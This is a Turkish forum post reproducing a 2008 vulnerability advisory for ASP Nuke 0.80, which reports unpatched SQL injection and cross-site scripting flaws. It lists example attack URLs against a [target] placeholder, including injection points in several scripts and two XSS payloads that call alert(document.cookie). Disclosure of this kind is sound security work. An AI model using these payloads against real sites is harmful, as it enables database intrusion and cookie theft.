Hayata Dair Herşey
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Arama
Sonuç :
Mesajlar
Konular
çıkıntı araştırma
Hayata Dair Herşey
::
Bilgisayar & İnternet
::
Güvenlik
::
Güvenlik ve Güvenlik Açıkları
ASP Nuke Giriş Onaylama Güvenlik Açıkları
Yazar
Mesaj
CalvinKlein
Administrator
Mesaj Sayısı
:
1355
Yaş
:
29
Nerden
:
Nişantaşı
Rep
:
Ruh Hali
:
Takım
:
Kayıt tarihi :
06/04/08
Kişi sayfası
Oyunlar
:
Need for Speed
Konu: ASP Nuke Giriş Onaylama Güvenlik Açıkları
Perş. Haz. 05, 2008 3:13 am
Konu: ASPNuke
Etkisi: Uzaktan SQL komutları çalıştırma
Etkilenen sürüm: 0.80
ASP Nuke yazılımında SQL Injection ve XSS (cross-site scripting) açıkları tespit edildi. profile.asp ve select.asp script'leri kullanıcının girdiği HTML kodlarını düzgün olarak filtrelemiyor. Bu açık sayesinde uzaktaki bir kullanıcı SQL komutları çalıştırabiliyor ve cross-site scripting saldırısı gerçekleştirebiliyor.
ör:
http://[target]/module/support/task/comments.asp?taskid='SQL_INJECTION
http://[target]
/module/support/task/detail.asp?taskid='SQL_INJECTION
http://[target]/module/article/article/article.asp?articleid='SQL_INJECTION
http://[target]/module/discuss/forum/profile.asp?topicid=1&thradid=346&username='%22%3E
%3Cs cript%3Ealert(document·cookie)%3C/script%3E
http://[target]/module/support/language/select.asp?code='%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E
Çözüm:
Henüz bir yama yada yeni sürüm çıkmadı
Like
Dislike
ASP Nuke Giriş Onaylama Güvenlik Açıkları
1
sayfadaki
1
sayfası
Similar topics
Similar topics
»
E-posta Onaylama
Bu forumun müsaadesi var:
Bu forumdaki mesajlara cevap
veremezsiniz
Hayata Dair Herşey
::
Bilgisayar & İnternet
::
Güvenlik
::
Güvenlik ve Güvenlik Açıkları
Hayata Dair Herşey
::
Bilgisayar & İnternet
::
Güvenlik
::
Güvenlik ve Güvenlik Açıkları
Buraya geçin:
Bir Forum Seçin
|
|--!! .. Forum KinG .. !!
| |--..:: Öneriler & Şikayetler ::..
| |--..:: Tanışalım & Kaynaşalım ::..
| |--..:: Forum KinG'de Görev Almak İsteyenler ::..
|
|--ForumKinG Café
| |--Yarışmalar & Kutlamalar
| |--Anketler
| |--Bir Sorunum Var
| |--Seviyeli Konular
| |--Konu Dışı
|
|--Bilgisayar & İnternet
| |--İşletim Sistemleri
| | |--Windows İşletim Sistemi
| | |--Mac OS
| | |--Linux İşletim Sistemi
| |
| |--Bilgisayar ve Donanım
| | |--Donanım Haberleri ve İncelemeleri
| | |--Güncel Driver & BIOS
| |
| |--Customization Center
| | |--Themes (Temalar)
| | |--Media Players Skins
| | |--Wallpapers (Duvar Kağıtları)
| | |--Ekran Koruyucu ve İkon Paylaşımları
| |
| |--Grafik ve 3D Tasarım
| |--Güvenlik
| | |--Güvenlik ve Güvenlik Açıkları
| | |--Mail Yardım
| |
| |--Network & İnternet
| |--Program
| |--Program Download
| |--Resimli Program Anlatımı
| |--İncelemer & Haberler
|
|--ChaT & SohbeT
| |--Windows Live Messenger
| | |--Hata & Sorunları
| | |--Msn Eklentileri & Programları
| | |--Dinamik Görüntü Resimleri & Avatarlar
| | |--Göz Kırpmaları (Winks) & ArkaPlanlar
| | |--Messenger İfadeleri (Smiley)
| | |--Msn Spaces & WebMessenger
| |
| |--Google Talk
| |--Yahoo Messenger
| |--ICQ Messenger
| |--Hazır Nickler ve Kişisel İletiler
|
|--MÜZİK-(Mp3 Paylaşımı Kesinlikle Yasaktır!)
| |--Müzik Genel
| |--Şarkı Sözleri
| | |--Yerli Şarkı Sözleri
| | |--Yabancı Şarkı Sözleri
| | |--Türkçe Çeviriler
| |
| |--Albüm Tanıtımları
| |--Yerli Sanatçıların Albümleri
| |--Yabancı Sanatçıların Albümleri
|
|--Eğitim & Öğretim
| |--Eğitim Genel
| |--Üniversiteler
| |--Liseler
|
|--KomiK...
| |--..:: KomiK Resimler ::..
| |--..:: KomiK Videolar ::..
| |--..:: Flash Animasyonlar ::..
| |--..:: KomiK Karikatürler ::..
| |--..:: KomiK Fıkra & Yazılar ::..
|
|--!!.. KinG TuninG ..!!
| |--Otomobil Tanıtımları
| |--TuninG
| | |--Modifiye
| | |--Modifiye Galeri
| | |--oTo Hi-Fi
| | |--Sanal TuninG
| | |--Yeni ve Concept Araçlar
| | |--Karşılaştırmalar
| |
| |--MotorSporları
| |--FORMULA 1
| |--Motosiklet
| |--RALLİ
| |--DRAG
| |--DRİFT
|
|--Oyun Dünyası
| |--Genel Oyun Bilgileri
| |--PlayStatıon Fan Club
| |--..:: Oyun Hile & İpuçları ::..
| |--Macera Oyunları
| |--Aksiyon Oyunları
| |--Savaş Oyunları
| |--Yarış Oyunları
| |--Strateji Oyunları
| |--Korku Oyunları
| |--Spor Oyunları
| |--Next Gen Konsollar
| |--Haberler
|
|--Mobil Dünyası
|--..:: Sony Ericsson ::..
| |---Resim & Ekran Koruyucuları & Zil Sesleri
| |---Temalar & Oyunlar
| |---Software & Programlar
|
|--..:: Nokia ::..
| |---Temalar & Oyunlar
| |---Resim & Ekran Koruyucuları & Zil Sesleri
| |---Software & Programlar
|
|--..:: Diğer Cep Telefonları :::.
|--..:: Operatörler ::..
Konu: ASP Nuke Giriş Onaylama Güvenlik Açıkları 
Perş. Haz. 05, 2008 3:13 am
